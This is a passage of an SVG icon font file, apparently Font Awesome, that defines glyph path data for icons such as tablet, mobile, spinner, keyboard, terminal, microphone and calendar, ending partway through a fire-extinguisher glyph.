d="M624 32c8.7998 0 16 -7.2002 16 -16v-16c0 -35.2002 -28.7998 -64 -64 -64h-512c-35.2002 0 -64 28.7998 -64 64v16c0 8.7998 7.2002 16 16 16h239.23c-0.25 -14.5303 14.0791 -32 32.7695 -32h60.7998c18.0303 0 32 12.1904 32.7402 32h242.46zM576 400v-336h-512v336
c0 26.4004 21.5996 48 48 48h416c26.4004 0 48 -21.5996 48 -48zM512 128v256h-384v-256h384z" />
    <glyph glyph-name="tablet" unicode="&#xf10a;" horiz-adv-x="448" 
d="M400 448c26.5 0 48 -21.5 48 -48v-416c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v416c0 26.5 21.5 48 48 48h352zM224 -32c17.7002 0 32 14.2998 32 32s-14.2998 32 -32 32s-32 -14.2998 -32 -32s14.2998 -32 32 -32z" />
    <glyph glyph-name="mobile" unicode="&#xf10b;" horiz-adv-x="320" 
d="M272 448c26.5 0 48 -21.5 48 -48v-416c0 -26.5 -21.5 -48 -48 -48h-224c-26.5 0 -48 21.5 -48 48v416c0 26.5 21.5 48 48 48h224zM160 -32c17.7002 0 32 14.2998 32 32s-14.2998 32 -32 32s-32 -14.2998 -32 -32s14.2998 -32 32 -32z" />
    <glyph glyph-name="quote-left" unicode="&#xf10d;" 
d="M464 192c26.5 0 48 -21.5 48 -48v-128c0 -26.5 -21.5 -48 -48 -48h-128c-26.5 0 -48 21.5 -48 48v240c0 88.4004 71.5996 160 160 160h8c13.2998 0 24 -10.7002 24 -24v-48c0 -13.2998 -10.7002 -24 -24 -24h-8c-35.2998 0 -64 -28.7002 -64 -64v-64h80zM176 192
c26.5 0 48 -21.5 48 -48v-128c0 -26.5 -21.5 -48 -48 -48h-128c-26.5 0 -48 21.5 -48 48v240c0 88.4004 71.5996 160 160 160h8c13.2998 0 24 -10.7002 24 -24v-48c0 -13.2998 -10.7002 -24 -24 -24h-8c-35.2998 0 -64 -28.7002 -64 -64v-64h80z" />
    <glyph glyph-name="quote-right" unicode="&#xf10e;" 
d="M464 416c26.5 0 48 -21.5 48 -48v-240c0 -88.4004 -71.5996 -160 -160 -160h-8c-13.2998 0 -24 10.7002 -24 24v48c0 13.2998 10.7002 24 24 24h8c35.2998 0 64 28.7002 64 64v64h-80c-26.5 0 -48 21.5 -48 48v128c0 26.5 21.5 48 48 48h128zM176 416
c26.5 0 48 -21.5 48 -48v-240c0 -88.4004 -71.5996 -160 -160 -160h-8c-13.2998 0 -24 10.7002 -24 24v48c0 13.2998 10.7002 24 24 24h8c35.2998 0 64 28.7002 64 64v64h-80c-26.5 0 -48 21.5 -48 48v128c0 26.5 21.5 48 48 48h128z" />
    <glyph glyph-name="spinner" unicode="&#xf110;" 
d="M304 400c0 -26.5098 -21.4902 -48 -48 -48s-48 21.4902 -48 48s21.4902 48 48 48s48 -21.4902 48 -48zM256 32c26.5098 0 48 -21.4902 48 -48s-21.4902 -48 -48 -48s-48 21.4902 -48 48s21.4902 48 48 48zM464 240c26.5098 0 48 -21.4902 48 -48s-21.4902 -48 -48 -48
s-48 21.4902 -48 48s21.4902 48 48 48zM96 192c0 -26.5098 -21.4902 -48 -48 -48s-48 21.4902 -48 48s21.4902 48 48 48s48 -21.4902 48 -48zM108.922 92.9219c26.5088 0 48 -21.4912 48 -48c0 -26.5098 -21.4902 -48 -48 -48s-48 21.4902 -48 48s21.4902 48 48 48z
M403.078 92.9219c26.5098 0 48 -21.4912 48 -48c0 -26.5098 -21.4902 -48 -48 -48s-48 21.4902 -48 48s21.4902 48 48 48zM108.922 387.078c26.5088 0 48 -21.4902 48 -48s-21.4902 -48 -48 -48s-48 21.4902 -48 48s21.4902 48 48 48z" />
    <glyph glyph-name="circle" unicode="&#xf111;" 
d="M256 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248z" />
    <glyph glyph-name="smile" unicode="&#xf118;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM328 272c-17.7002 0 -32 -14.2998 -32 -32s14.2998 -32 32 -32s32 14.2998 32 32s-14.2998 32 -32 32zM168 272c-17.7002 0 -32 -14.2998 -32 -32s14.2998 -32 32 -32
s32 14.2998 32 32s-14.2998 32 -32 32zM362.8 101.8c13.5 16.2998 -11.2002 36.7002 -24.5996 20.5c-22.4004 -26.7998 -55.2002 -42.2002 -90.2002 -42.2002s-67.7998 15.3008 -90.2002 42.2002c-13.5996 16.2002 -38.2002 -4.2002 -24.5996 -20.5
c28.5 -34.2002 70.2998 -53.7998 114.8 -53.7998s86.2998 19.5996 114.8 53.7998z" />
    <glyph glyph-name="frown" unicode="&#xf119;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM328 272c-17.7002 0 -32 -14.2998 -32 -32s14.2998 -32 32 -32s32 14.2998 32 32s-14.2998 32 -32 32zM168 272c-17.7002 0 -32 -14.2998 -32 -32s14.2998 -32 32 -32
s32 14.2998 32 32s-14.2998 32 -32 32zM338.2 53.7998c13.5 -16.2998 38.0996 4.2002 24.5 20.4004c-28.4004 34.2002 -70.2998 53.7998 -114.7 53.7998s-86.2998 -19.5996 -114.8 -53.7002c-13.5 -16.2998 11.0996 -36.7998 24.5996 -20.5
c22.4004 26.7998 55.2998 42.2002 90.2002 42.2002s67.7998 -15.4004 90.2002 -42.2002z" />
    <glyph glyph-name="meh" unicode="&#xf11a;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM168 272c-17.7002 0 -32 -14.2998 -32 -32s14.2998 -32 32 -32s32 14.2998 32 32s-14.2998 32 -32 32zM344 80c21.2002 0 21.2002 32 0 32h-192c-21.2002 0 -21.2002 -32 0 -32
h192zM328 208c17.7002 0 32 14.2998 32 32s-14.2998 32 -32 32s-32 -14.2998 -32 -32s14.2998 -32 32 -32z" />
    <glyph glyph-name="gamepad" unicode="&#xf11b;" horiz-adv-x="639" 
d="M480 352c88.4004 0 159.9 -71.5996 159.9 -160s-71.6006 -160 -160 -160c-44.7002 0 -85.2002 18.4004 -114.2 48h-91.5c-29 -29.5996 -69.4004 -48 -114.2 -48c-88.4004 0 -160 71.5996 -160 160s71.5996 160 160 160h320zM256 172v40c0 6.59961 -5.40039 12 -12 12h-52
v52c0 6.59961 -5.40039 12 -12 12h-40c-6.59961 0 -12 -5.40039 -12 -12v-52h-52c-6.59961 0 -12 -5.40039 -12 -12v-40c0 -6.59961 5.40039 -12 12 -12h52v-52c0 -6.59961 5.40039 -12 12 -12h40c6.59961 0 12 5.40039 12 12v52h52c6.59961 0 12 5.40039 12 12zM440 104
c26.5 0 48 21.5 48 48s-21.5 48 -48 48s-48 -21.5 -48 -48s21.5 -48 48 -48zM520 184c26.5 0 48 21.5 48 48s-21.5 48 -48 48s-48 -21.5 -48 -48s21.5 -48 48 -48z" />
    <glyph glyph-name="keyboard" unicode="&#xf11c;" horiz-adv-x="576" 
d="M528 0h-480c-26.5098 0 -48 21.4902 -48 48v288c0 26.5098 21.4902 48 48 48h480c26.5098 0 48 -21.4902 48 -48v-288c0 -26.5098 -21.4902 -48 -48 -48zM128 268v40c0 6.62695 -5.37305 12 -12 12h-40c-6.62695 0 -12 -5.37305 -12 -12v-40
c0 -6.62695 5.37305 -12 12 -12h40c6.62695 0 12 5.37305 12 12zM224 268v40c0 6.62695 -5.37305 12 -12 12h-40c-6.62695 0 -12 -5.37305 -12 -12v-40c0 -6.62695 5.37305 -12 12 -12h40c6.62695 0 12 5.37305 12 12zM320 268v40c0 6.62695 -5.37305 12 -12 12h-40
c-6.62695 0 -12 -5.37305 -12 -12v-40c0 -6.62695 5.37305 -12 12 -12h40c6.62695 0 12 5.37305 12 12zM416 268v40c0 6.62695 -5.37305 12 -12 12h-40c-6.62695 0 -12 -5.37305 -12 -12v-40c0 -6.62695 5.37305 -12 12 -12h40c6.62695 0 12 5.37305 12 12zM512 268v40
c0 6.62695 -5.37305 12 -12 12h-40c-6.62695 0 -12 -5.37305 -12 -12v-40c0 -6.62695 5.37305 -12 12 -12h40c6.62695 0 12 5.37305 12 12zM176 172v40c0 6.62695 -5.37305 12 -12 12h-40c-6.62695 0 -12 -5.37305 -12 -12v-40c0 -6.62695 5.37305 -12 12 -12h40
c6.62695 0 12 5.37305 12 12zM272 172v40c0 6.62695 -5.37305 12 -12 12h-40c-6.62695 0 -12 -5.37305 -12 -12v-40c0 -6.62695 5.37305 -12 12 -12h40c6.62695 0 12 5.37305 12 12zM368 172v40c0 6.62695 -5.37305 12 -12 12h-40c-6.62695 0 -12 -5.37305 -12 -12v-40
c0 -6.62695 5.37305 -12 12 -12h40c6.62695 0 12 5.37305 12 12zM464 172v40c0 6.62695 -5.37305 12 -12 12h-40c-6.62695 0 -12 -5.37305 -12 -12v-40c0 -6.62695 5.37305 -12 12 -12h40c6.62695 0 12 5.37305 12 12zM128 76v40c0 6.62695 -5.37305 12 -12 12h-40
c-6.62695 0 -12 -5.37305 -12 -12v-40c0 -6.62695 5.37305 -12 12 -12h40c6.62695 0 12 5.37305 12 12zM416 76v40c0 6.62695 -5.37305 12 -12 12h-232c-6.62695 0 -12 -5.37305 -12 -12v-40c0 -6.62695 5.37305 -12 12 -12h232c6.62695 0 12 5.37305 12 12zM512 76v40
c0 6.62695 -5.37305 12 -12 12h-40c-6.62695 0 -12 -5.37305 -12 -12v-40c0 -6.62695 5.37305 -12 12 -12h40c6.62695 0 12 5.37305 12 12z" />
    <glyph glyph-name="flag-checkered" unicode="&#xf11e;" horiz-adv-x="519" 
d="M243.2 258.1c24.2002 -6.69922 47.5996 -16.3994 73.5996 -22.1992v-68.2002c-24.2998 6.7002 -47.5 16.3994 -73.5996 22.2998v68.0996zM466.5 381.1c21.2002 9.80078 45.5 -5.69922 45.4004 -29v-243.1c0 -10.5996 -5.10059 -20.4004 -13.8008 -26.4004
c-35.7998 -24.5996 -74.2998 -40.8994 -122.5 -40.8994c-67.3994 0 -111.6 34.7998 -165.199 34.7998c-50.8008 0 -86.1006 -10 -114.4 -22.0996v-94.4004c0 -13.2998 -10.7002 -24 -24 -24h-16c-13.2998 0 -24 10.7002 -24 24v386.1c-14.5 10.1006 -24 26.9004 -24 45.9004
c0 31.7002 26.2998 57.2998 58.2998 56c28.5 -1.2002 51.7998 -24 53.6006 -52.4004c0.5 -8.39941 -0.800781 -16.2998 -3.60059 -23.5996c20.7002 7.59961 43 12 68 12c67.4004 0 111.7 -34.7998 165.2 -34.7998c40.5 0 82.7002 16 117 31.8994zM169.6 122.5v71.2998
c-26.0996 -2.39941 -47.3994 -8.09961 -73.5996 -17.3994v-70.5c23.5996 8.39941 47.7998 13.8994 73.5996 16.5996zM464 257v70.5c-21.2998 -8.90039 -46.5996 -17.7002 -73.5996 -22.5v-71.9004c-26 -4.19922 -49.9004 -2.59961 -73.6006 2.7002v68.4004
c-26.3994 4.59961 -49.8994 13.8994 -73.5996 21.2998v-67.4004c-25.2002 7 -46.6006 9.40039 -73.6006 5.7002v71.6006c-23.5 -2.2002 -40.3994 -9.80078 -73.5996 -22v-70.5c29 10.6992 51.2002 17.7998 73.5996 20.8994v-70c32.8008 3 53.9004 0.600586 73.6006 -3.7998
v-68.5c26.2998 -4.59961 49.7002 -13.9004 73.5996 -21.2998v67.3994c25.7002 -7.09961 46.6006 -9.2998 73.6006 -5.59961v-71.5996c25.0996 2.39941 48.5 11 73.5996 27.0996v70.5c-22.2002 -14.2002 -48.7998 -22.5996 -73.5996 -26v71.0996
c27.2998 4.40039 50 14.1006 73.5996 23.9004z" />
    <glyph glyph-name="terminal" unicode="&#xf120;" horiz-adv-x="640" 
d="M257.981 175.029l-194.344 -194.344c-9.37305 -9.37207 -24.5684 -9.37207 -33.9404 0l-22.668 22.667c-9.35742 9.35742 -9.375 24.5225 -0.0400391 33.9014l154.021 154.746l-154.021 154.745c-9.33496 9.37891 -9.31738 24.5439 0.0400391 33.9014l22.667 22.667
c9.37305 9.37207 24.5684 9.37207 33.9404 0l194.344 -194.344c9.37207 -9.37207 9.37207 -24.5674 0 -33.9404zM640 -8c0 -13.2549 -10.7451 -24 -24 -24h-304c-13.2549 0 -24 10.7451 -24 24v32c0 13.2549 10.7451 24 24 24h304c13.2549 0 24 -10.7451 24 -24v-32z" />
    <glyph glyph-name="code" unicode="&#xf121;" horiz-adv-x="640" 
d="M278.9 -63.5l-61 17.7002c-6.40039 1.7998 -10 8.5 -8.2002 14.8994l136.5 470.2c1.7998 6.40039 8.5 10 14.8994 8.2002l61 -17.7002c6.40039 -1.7998 10 -8.5 8.2002 -14.8994l-136.5 -470.2c-1.89941 -6.40039 -8.5 -10.1006 -14.8994 -8.2002zM164.9 48.7002
c-4.5 -4.90039 -12.1006 -5.10059 -17 -0.5l-144.101 135.1c-5.09961 4.7002 -5.09961 12.7998 0 17.5l144.101 135c4.89941 4.60059 12.5 4.2998 17 -0.5l43.5 -46.3994c4.69922 -4.90039 4.2998 -12.7002 -0.800781 -17.2002l-90.5996 -79.7002l90.5996 -79.7002
c5.10059 -4.5 5.40039 -12.2998 0.800781 -17.2002zM492.1 48.0996c-4.89941 -4.5 -12.5 -4.2998 -17 0.600586l-43.5 46.3994c-4.69922 4.90039 -4.2998 12.7002 0.800781 17.2002l90.5996 79.7002l-90.5996 79.7998c-5.10059 4.5 -5.40039 12.2998 -0.800781 17.2002
l43.5 46.4004c4.60059 4.7998 12.2002 5 17 0.5l144.101 -135.2c5.09961 -4.7002 5.09961 -12.7998 0 -17.5z" />
    <glyph glyph-name="reply-all" unicode="&#xf122;" horiz-adv-x="576" 
d="M136.309 258.164l176.005 151.985c15.4062 13.3047 39.6865 2.50293 39.6865 -18.1641v-82.7637c129.182 -10.2305 224 -52.2119 224 -183.548c0 -61.4404 -39.582 -122.309 -83.333 -154.132c-13.6533 -9.93066 -33.1113 2.5332 -28.0771 18.6309
c38.5117 123.162 -3.92188 169.482 -112.59 182.016v-84.1758c0 -20.7012 -24.2998 -31.4531 -39.6865 -18.1641l-176.005 151.987c-11.0703 9.56152 -11.0859 26.7529 0 36.3281zM8.30859 221.836c-11.0703 9.56152 -11.0859 26.7529 0 36.3281l176.005 151.985
c15.4062 13.3047 39.6865 2.50293 39.6865 -18.1641v-15.8174l-108.607 -93.7861c-10.7041 -9.23926 -19.3926 -28.2158 -19.3926 -42.3564v-0.0234375v-0.0244141c0 -14.1416 8.68848 -33.1191 19.3936 -42.3604l108.606 -93.7852v-15.8184
c0 -20.7002 -24.2998 -31.4531 -39.6865 -18.1641z" />
    <glyph glyph-name="location-arrow" unicode="&#xf124;" 
d="M444.52 444.48c38.3809 16 79.9609 -25.5801 63.9707 -63.9707l-191.9 -415.779c-22.3896 -47.9805 -92.75 -31.9805 -92.75 19.1895v175.91h-175.91c-51.1699 0 -67.1602 70.3604 -19.1895 92.75z" />
    <glyph glyph-name="crop" unicode="&#xf125;" 
d="M488 96c13.25 0 24 -10.7402 24 -24v-48c0 -13.25 -10.75 -24 -24 -24h-40v-40c0 -13.25 -10.75 -24 -24 -24h-48c-13.25 0 -24 10.75 -24 24v282.75l-146.75 -146.75h114.75v-96h-232c-13.25 0 -24 10.75 -24 24v264h-40c-13.25 0 -24 10.75 -24 24v48
c0 13.2598 10.75 24 24 24h40v40c0 13.2598 10.75 24 24 24h48c13.25 0 24 -10.7402 24 -24v-282.75l146.75 146.75h-114.75v96h210.75l59.3096 59.3096c6.25 6.25 16.3809 6.25 22.6309 0l22.6191 -22.6191c6.25 -6.25 6.25 -16.3809 0 -22.6309l-59.3096 -59.3096v-242.75
h40z" />
    <glyph glyph-name="code-branch" unicode="&#xf126;" horiz-adv-x="384" 
d="M384 304c0 -35.2002 -22.7998 -65.0996 -54.4004 -75.9004c-0.5 -28.0996 -7.59961 -50.5 -21.5996 -67.8994c-28.2002 -35 -76 -39.5 -118.2 -43.4004c-25.7002 -2.39941 -49.8994 -4.59961 -66.0996 -12.7998c-7.10059 -3.59961 -11.7998 -8.2002 -14.9004 -13.4004
c30 -11.5 51.2002 -40.5996 51.2002 -74.5996c0 -44.2002 -35.7998 -80 -80 -80s-80 35.7998 -80 80c0 35.7998 23.5 66.0996 56 76.4004v199.3c-32.5 10.2002 -56 40.5 -56 76.2998c0 44.2002 35.7998 80 80 80s80 -35.7998 80 -80c0 -35.7998 -23.5 -66.0996 -56 -76.2998
v-144c23.9004 11.5 53.0996 14.2998 81.2998 16.8994c35.9004 3.30078 69.7998 6.5 85.2002 25.7002c6.7998 8.40039 10.4004 20.7998 11 36.9004c-33.2002 9.7002 -57.5 40.3994 -57.5 76.7998c0 44.2002 35.7998 80 80 80s80 -35.7998 80 -80zM80 384
c-8.7998 0 -16 -7.2002 -16 -16s7.2002 -16 16 -16s16 7.2002 16 16s-7.2002 16 -16 16zM80 0c8.7998 0 16 7.2002 16 16s-7.2002 16 -16 16s-16 -7.2002 -16 -16s7.2002 -16 16 -16zM304 320c-8.7998 0 -16 -7.2002 -16 -16s7.2002 -16 16 -16s16 7.2002 16 16
s-7.2002 16 -16 16z" />
    <glyph glyph-name="unlink" unicode="&#xf127;" 
d="M304.083 42.0928c4.68555 -4.68555 4.68555 -12.2842 0 -16.9707l-44.6738 -44.6738c-59.2627 -59.2627 -155.693 -59.2666 -214.961 0c-59.2646 59.2646 -59.2646 155.695 0 214.96l44.6748 44.6748c4.68555 4.68555 12.2842 4.68555 16.9707 0l39.5986 -39.5977
c4.68555 -4.68652 4.68555 -12.2842 0 -16.9717l-44.6758 -44.6738c-28.0713 -28.0732 -28.0713 -73.75 0 -101.823c28.0723 -28.0713 73.75 -28.0723 101.824 0l44.6738 44.6748c4.68652 4.68555 12.2842 4.68555 16.9717 0zM247.515 302.309l-39.5967 39.5986
c-4.68555 4.68652 -4.68555 12.2852 0 16.9707l44.6738 44.6738c59.2666 59.2646 155.695 59.2646 214.961 0s59.2656 -155.694 0 -214.96l-44.6748 -44.6748c-4.68652 -4.68555 -12.2852 -4.68555 -16.9707 0l-39.5986 39.5977c-4.68555 4.6875 -4.68555 12.2852 0 16.9717
l44.6758 44.6738c28.0713 28.0732 28.0713 73.75 0 101.823c-28.0742 28.0723 -73.752 28.0742 -101.824 0l-44.6738 -44.6748c-4.6875 -4.68555 -12.2852 -4.68555 -16.9717 0zM482.343 -56.9707c-9.37207 -9.37207 -24.5674 -9.37207 -33.9404 0l-441.373 441.373
c-9.37305 9.37207 -9.37305 24.5674 0 33.9404l22.6279 22.6279c9.37207 9.37305 24.5674 9.37305 33.9404 0l441.372 -441.374c9.37305 -9.37207 9.37305 -24.5674 0 -33.9404z" />
    <glyph glyph-name="question" unicode="&#xf128;" horiz-adv-x="403" 
d="M202.021 448c84.8809 0 175.482 -66.2559 175.481 -153.6c0 -115.982 -125.268 -117.768 -125.268 -160.627v-5.77344c0 -13.2549 -10.7451 -24 -24 -24h-72.4717c-13.2549 0 -24 10.7451 -24 24v9.78809c0 61.8291 46.876 86.5449 82.2998 106.405
c30.376 17.0293 48.9922 28.6113 48.9922 51.1641c0 29.832 -38.0518 49.6309 -68.8154 49.6309c-39.127 0 -57.708 -18.0684 -82.7568 -49.4492c-8.12109 -10.1738 -22.8809 -12.0127 -33.2529 -4.14844l-43.1387 32.709c-10.2705 7.78809 -12.541 22.2939 -5.17773 32.874
c40.5889 58.3232 92.2881 91.0264 172.107 91.0264zM192 74.541c38.1963 0 69.2715 -31.0742 69.2715 -69.2695c0 -38.1963 -31.0752 -69.2715 -69.2715 -69.2715s-69.2715 31.0752 -69.2715 69.2695c0 38.1963 31.0752 69.2715 69.2715 69.2715z" />
    <glyph glyph-name="info" unicode="&#xf129;" horiz-adv-x="192" 
d="M20 23.7715h20v144.457h-20c-11.0459 0 -20 8.9541 -20 20v47.7715c0 11.0459 8.9541 20 20 20h112c11.0459 0 20 -8.9541 20 -20v-212.229h20c11.0459 0 20 -8.9541 20 -20v-47.7715c0 -11.0459 -8.9541 -20 -20 -20h-152c-11.0459 0 -20 8.9541 -20 20v47.7715
c0 11.0459 8.9541 20 20 20zM96 448c39.7637 0 72 -32.2354 72 -72s-32.2354 -72 -72 -72s-72 32.2354 -72 72s32.2354 72 72 72z" />
    <glyph glyph-name="exclamation" unicode="&#xf12a;" horiz-adv-x="192" 
d="M176 16c0 -44.1123 -35.8877 -80 -80 -80s-80 35.8877 -80 80s35.8877 80 80 80s80 -35.8877 80 -80zM25.2598 422.801c-0.68457 13.709 10.2441 25.1992 23.9707 25.1992h93.5391c13.7266 0 24.6553 -11.4902 23.9707 -25.1992l-13.6006 -272
c-0.638672 -12.7725 -11.1807 -22.8008 -23.9697 -22.8008h-66.3398c-12.7891 0 -23.3311 10.0283 -23.9697 22.8008z" />
    <glyph glyph-name="superscript" unicode="&#xf12b;" 
d="M272 256c8.7998 0 16 -7.2002 16 -16v-32c0 -8.7998 -7.2002 -16 -16 -16h-28l-52.5996 -75.7002l58.5996 -84.2998h22c8.7998 0 16 -7.2002 16 -16v-32c0 -8.7998 -7.2002 -16 -16 -16h-62.4004c-5.5 0 -10.5996 2.7998 -13.5 7.5l-45.6992 72.5996
c-2.30078 3.30078 -4.40039 7 -6.2002 10.2002c-1.7002 -3.2998 -3.7002 -7 -5.90039 -10.5996l-44.7002 -72.1006c-2.89941 -4.69922 -8.09961 -7.59961 -13.5996 -7.59961h-64c-8.7998 0 -16 7.2002 -16 16v32c0 8.7998 7.2002 16 16 16h26.2998l56.6006 82.7002
l-52.8008 77.2998h-30.0996c-8.7998 0 -16 7.2002 -16 16v32c0 8.7998 7.2002 16 16 16h68.9004c5.5 0 10.6992 -2.90039 13.5996 -7.59961l39.9004 -65.1006c2 -3.59961 4 -7.2002 5.69922 -10.3994c1.7002 3.19922 3.90039 6.89941 6.2002 10.5l40.2998 65
c2.90039 4.69922 8.10059 7.59961 13.6006 7.59961h67.7998zM496 192c8.7998 0 16 -7.2002 16 -15.9004v-32c0 -8.7998 -7.2002 -16 -16 -16h-168.1c-8.10059 0 -14.8008 5.90039 -15.9004 13.9004c-0.799805 6.2998 -1.40039 12.5996 -1.40039 19.2998
c0 103 119.4 123.8 119.4 160c0 11 -6.90039 23.9004 -26.2998 23.9004c-12.9004 0 -23.7002 -7.7998 -31.7002 -18.2002c-5.09961 -6.7002 -14.5996 -8.2998 -21.5996 -3.59961l-30.3008 20.2998c-7.19922 4.89941 -9.2998 14.5996 -4.59961 21.8994
c18 28.4004 51.9004 50.4004 94.4004 50.4004c47.0996 0 97.7998 -27.5 97.7998 -88.0996c0 -24.4004 -8.40039 -45.5 -25.9004 -64.6006c-14.7998 -16.2998 -33.7002 -28.2998 -50.2998 -38.8994c-17.5 -11.1006 -32.7998 -21.9004 -36.2998 -32.4004h100.8z" />
    <glyph glyph-name="subscript" unicode="&#xf12c;" 
d="M272 416c8.7998 0 16 -7.2002 16 -16v-32c0 -8.7998 -7.2002 -16 -16 -16h-28l-52.5996 -75.7002l58.5996 -84.2998h22c8.7998 0 16 -7.2002 16 -16v-32c0 -8.7998 -7.2002 -16 -16 -16h-62.4004c-5.5 0 -10.5996 2.7998 -13.5 7.5l-45.6992 72.5996
c-2.30078 3.30078 -4.40039 7 -6.2002 10.2002c-1.7002 -3.2998 -3.7002 -7 -5.90039 -10.5996l-44.7002 -72.1006c-2.89941 -4.69922 -8.09961 -7.59961 -13.5996 -7.59961h-64c-8.7998 0 -16 7.2002 -16 16v32c0 8.7998 7.2002 16 16 16h26.2998l56.6006 82.7002
l-52.8008 77.2998h-30.0996c-8.7998 0 -16 7.2002 -16 16v32c0 8.7998 7.2002 16 16 16h68.9004c5.5 0 10.6992 -2.90039 13.5996 -7.59961l39.9004 -65.1006c2 -3.59961 4 -7.2002 5.69922 -10.3994c1.7002 3.19922 3.90039 6.89941 6.2002 10.5l40.2998 65
c2.90039 4.69922 8.10059 7.59961 13.6006 7.59961h67.7998zM496 32c8.7998 0 16 -7.2002 16 -15.9004v-32c0 -8.7998 -7.2002 -16 -16 -16h-168.1c-8.10059 0 -14.8008 5.90039 -15.9004 13.9004c-0.799805 6.2998 -1.40039 12.5996 -1.40039 19.2998
c0 103 119.4 123.8 119.4 160c0 11 -6.90039 23.9004 -26.2998 23.9004c-12.9004 0 -23.7002 -7.7998 -31.7002 -18.2002c-5.09961 -6.7002 -14.5996 -8.2998 -21.5996 -3.59961l-30.3008 20.2998c-7.19922 4.89941 -9.2998 14.5996 -4.59961 21.8994
c18 28.4004 51.9004 50.4004 94.4004 50.4004c47.0996 0 97.7998 -27.5 97.7998 -88.0996c0 -24.4004 -8.40039 -45.5 -25.9004 -64.6006c-14.7998 -16.2998 -33.7002 -28.2998 -50.2998 -38.8994c-17.5 -11.1006 -32.7998 -21.9004 -36.2998 -32.4004h100.8z" />
    <glyph glyph-name="eraser" unicode="&#xf12d;" 
d="M497.941 174.059l-142.059 -142.059h144.117c6.62695 0 12 -5.37305 12 -12v-40c0 -6.62695 -5.37305 -12 -12 -12h-356c-10.9756 0 -26.1816 6.29883 -33.9424 14.0586l-96 96c-18.7441 18.7451 -18.7441 49.1377 0 67.8828l256 256
c18.7471 18.7451 49.1387 18.7441 67.8838 0l160 -160c18.7441 -18.7451 18.7441 -49.1377 0 -67.8828zM195.314 236.686l-124.687 -124.686l80 -80h114.745l67.3135 67.3135z" />
    <glyph glyph-name="puzzle-piece" unicode="&#xf12e;" horiz-adv-x="576" 
d="M519.442 159.349c37.5957 0 56.5576 -31.5928 56.5576 -65.792c0 -33.5469 -19.2881 -61.5566 -54.9229 -61.5557c-39.8848 0 -50.3457 36.1523 -86.3086 36.1523c-60.5518 0 -25.8262 -120.102 -25.8262 -120.102c-51.5557 0 -181.23 -35.0732 -181.23 25.7305
c0 35.8271 36.2881 46.25 36.2881 85.9844c0 35.501 -28.1152 54.7178 -61.7881 54.7178c-34.3271 0 -63.5771 -18.8906 -63.5771 -56.3467c0 -41.3633 40 -58.998 40 -81.4707c0 -69.709 -178.635 -28.6621 -178.635 -28.6621v333.237s175.885 -40.9609 175.884 28.6621
c0 22.4727 -31.7109 40.3857 -31.7109 81.75c0 37.4551 31.7119 56.3457 66.3662 56.3457c33.3457 0 61.4609 -19.2158 61.4609 -54.7178c0 -39.7354 -36.2881 -50.1582 -36.2881 -85.9854c0 -83.2969 196.288 -3.29688 196.288 -3.29688
s-54.5908 -176.244 5.38379 -176.244c22.5586 0 40.5391 31.5928 82.0586 31.5928z" />
    <glyph glyph-name="microphone" unicode="&#xf130;" horiz-adv-x="352" 
d="M176 96c-53.0195 0 -96 42.9805 -96 96v160c0 53.0195 42.9805 96 96 96s96 -42.9805 96 -96v-160c0 -53.0195 -42.9805 -96 -96 -96zM336 256c8.83984 0 16 -7.16016 16 -16v-48c0 -88.9004 -66.29 -162.47 -152 -174.23v-33.7695h56c8.83984 0 16 -7.16016 16 -16v-16
c0 -8.83984 -7.16016 -16 -16 -16h-160c-8.83984 0 -16 7.16016 -16 16v16c0 8.83984 7.16016 16 16 16h56v34.1504c-88.0303 12.1396 -152 92.0498 -152 181.689v40.1602c0 8.83984 7.16016 16 16 16h16c8.83984 0 16 -7.16016 16 -16v-42.2998
c0 -66.8105 48.71 -126.59 115.21 -133.08c76.2998 -7.44043 140.79 52.5801 140.79 127.38v48c0 8.83984 7.16016 16 16 16h16z" />
    <glyph glyph-name="microphone-slash" unicode="&#xf131;" horiz-adv-x="640" 
d="M633.82 -10.0996c6.97949 -5.43066 8.22949 -15.4805 2.81934 -22.4502l-19.6396 -25.2705c-5.42969 -6.97949 -15.4805 -8.23926 -22.46 -2.80957l-588.36 454.729c-6.97949 5.43066 -8.22949 15.4805 -2.80957 22.4502l19.6396 25.2705
c5.41992 6.97949 15.4805 8.22949 22.46 2.80957l178.54 -137.99v45.3604c0 53.0195 42.9805 96 96 96c53.0205 0 96 -42.9805 96 -96v-160.01c0 -10.4502 -2.17969 -20.2705 -5.2793 -29.6699l26.5498 -20.5205c6.75977 15.4004 10.7197 32.2803 10.7197 50.2002v48
c0 8.83984 7.16016 16 16 16h16c8.83984 0 16 -7.16016 16 -16v-48c0 -29.0098 -7.38965 -56.1299 -19.9805 -80.1396zM400 -16c8.83984 0 16 -7.16016 16 -16v-16c0 -8.83984 -7.16016 -16 -16 -16h-160c-8.83984 0 -16 7.16016 -16 16v16c0 8.83984 7.16016 16 16 16h56
v34.1504c-88.0303 12.1396 -152 92.0498 -152 181.689v6.85059l52.0303 -40.2305c12.4395 -53.2197 55.3301 -96.4004 111.18 -101.85c6.94043 -0.669922 13.6396 -0.200195 20.3496 0.199219l50.1104 -38.7295c-10.8203 -3.77051 -22.0098 -6.70996 -33.6699 -8.31055
v-33.7695h56z" />
    <glyph glyph-name="calendar" unicode="&#xf133;" horiz-adv-x="448" 
d="M12 256h424c6.59961 0 12 -5.40039 12 -12v-260c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v260c0 6.59961 5.40039 12 12 12zM448 300c0 -6.59961 -5.40039 -12 -12 -12h-424c-6.59961 0 -12 5.40039 -12 12v36c0 26.5 21.5 48 48 48h48v52
c0 6.59961 5.40039 12 12 12h40c6.59961 0 12 -5.40039 12 -12v-52h128v52c0 6.59961 5.40039 12 12 12h40c6.59961 0 12 -5.40039 12 -12v-52h48c26.5 0 48 -21.5 48 -48v-36z" />
    <glyph glyph-name="fire-extinguisher" unicode="&#xf134;" horiz-adv-x="448" 
